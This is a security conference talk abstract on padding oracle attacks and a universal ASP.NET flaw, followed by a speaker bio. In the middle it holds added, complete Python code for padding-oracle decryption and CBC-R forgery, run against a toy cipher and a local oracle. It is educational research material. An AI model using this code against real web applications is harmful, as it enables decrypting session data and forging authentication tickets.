THAI DUONG (Chief Information Security Officer)

Padding Oracles Everywhere

The first part of the presentation introduces the audience to Padding Oracle Attacks, the cryptographic concepts behind the vulnerability, and finally how to exploit it. A padding oracle is any observable difference (error message, status code or response time) between a ciphertext whose CBC decryption has valid padding and one whose padding is invalid; that single bit per query is enough to decrypt, and later encrypt, data without the key. We also describe the algorithms implemented in POET (Padding Oracle Exploit Tool), the free tool we released a few months ago that automatically finds and exploits Padding Oracle vulnerabilities in web applications.

The second part presents a previously unknown advanced attack. The most significant new discovery is a universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, forms authentication tickets, membership passwords, user data, and anything else encrypted using the framework's API!

Finally we demonstrate the attacks against real-world applications. We use the Padding Oracle attack to decrypt data and use CBC-R, which turns the same oracle into an encryption primitive by building the ciphertext backwards block by block, to encrypt our modifications. Then we abuse components present in every ASP.NET installation to forge authentication tickets and access applications with administrative rights. The vulnerabilities exploited affect a framework used by 25% of the websites on the Internet. The impact of the attack depends on the applications installed on the server, ranging from information disclosure to total system compromise.
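The two attacker-side steps named in this abstract, decryption through a padding oracle and CBC-R encryption, as an added example that is not POET's code nor anything from the talk. It assumes PKCS#7 padding under CBC and a server that answers differently for good and bad padding; the key, the sample plaintext and the forged plaintext are constructed here. Because the attack never touches the block cipher itself, a small HMAC-SHA256 Feistel permutation stands in for AES so the example runs with the standard library alone.

```python
import hashlib
import hmac

BLOCK = 16  # block size in bytes, as for AES

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _round(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    # Constructed stand-in for AES: a 4-round HMAC-SHA256 Feistel permutation.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, r, i))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, l, i)), l
    return l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(prev, padded[i:i + BLOCK]))
        out += prev
    return out
def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def padding_oracle(key, iv, ct):
    # The leak: the server answers differently for good and bad padding.
    try:
        unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, block):
    # Recover D_k(block) byte by byte (<= 256 queries each) without the key.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        probe = bytearray([0] * (pos + 1) + [b ^ pad_val for b in inter[pos + 1:]])  # tail -> pad_val
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe), block):
                continue
            if pos == BLOCK - 1:  # guard against a false positive such as ...02 02
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), block):
                    continue
            inter[pos] = guess ^ pad_val
            break
    return bytes(inter)

def oracle_decrypt(oracle, iv, ct):
    pt, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        pt += xor(recover_intermediate(oracle, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(pt)

def cbc_r_encrypt(oracle, plaintext):
    # CBC-R: pick the last block freely, walk backwards; C[i-1] = D_k(C[i]) ^ P[i].
    padded = pad(plaintext)
    blocks, nxt = [], bytes(BLOCK)  # last ciphertext block chosen arbitrarily
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        blocks.insert(0, nxt)
        nxt = xor(recover_intermediate(oracle, nxt), padded[i:i + BLOCK])
    return nxt, b"".join(blocks)  # (forged IV, forged ciphertext)

def demo():
    key = hashlib.sha256(b"server-side secret (constructed)").digest()
    secret, iv = b"role=user;uid=1042", bytes(range(BLOCK))  # constructed sample
    ct = cbc_encrypt(key, iv, pad(secret))
    oracle = lambda iv_, ct_: padding_oracle(key, iv_, ct_)  # attacker's only access
    recovered = oracle_decrypt(oracle, iv, ct)  # decrypt without the key
    forged_iv, forged_ct = cbc_r_encrypt(oracle, b"role=admin;uid=1")
    accepted = unpad(cbc_decrypt(key, forged_iv, forged_ct))  # what the server sees
    return recovered, accepted
```

Calling demo() returns the recovered plaintext and the forged plaintext exactly as the server decrypts it. The extra query on the last byte matters in practice: a guess that produces 0x02 when the preceding byte already decrypts to 0x02 also passes the check, and without the retest the whole block is recovered wrong. CBC-R as written needs the attacker to supply the IV; where the application fixes the IV, the same construction still works except that the first plaintext block is garbage, which is why real targets are attacked through fields that tolerate or ignore a leading junk block.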

About Thai Duong

Thai Duong is a hacker from Vietnam, currently working as the Chief Information Security Officer at one of Vietnam's leading commercial banks, where he leads the Information Security Department protecting 4 million customers who complete more than 500,000 transactions a day. Thai has eight years of experience in computer security and now specializes in cryptography and application security. He co-authored research on the MD5 length extension attack that made the Top Ten Web Hacking Techniques of 2009. Recently he presented on practical crypto attacks at Black Hat Europe 2010.
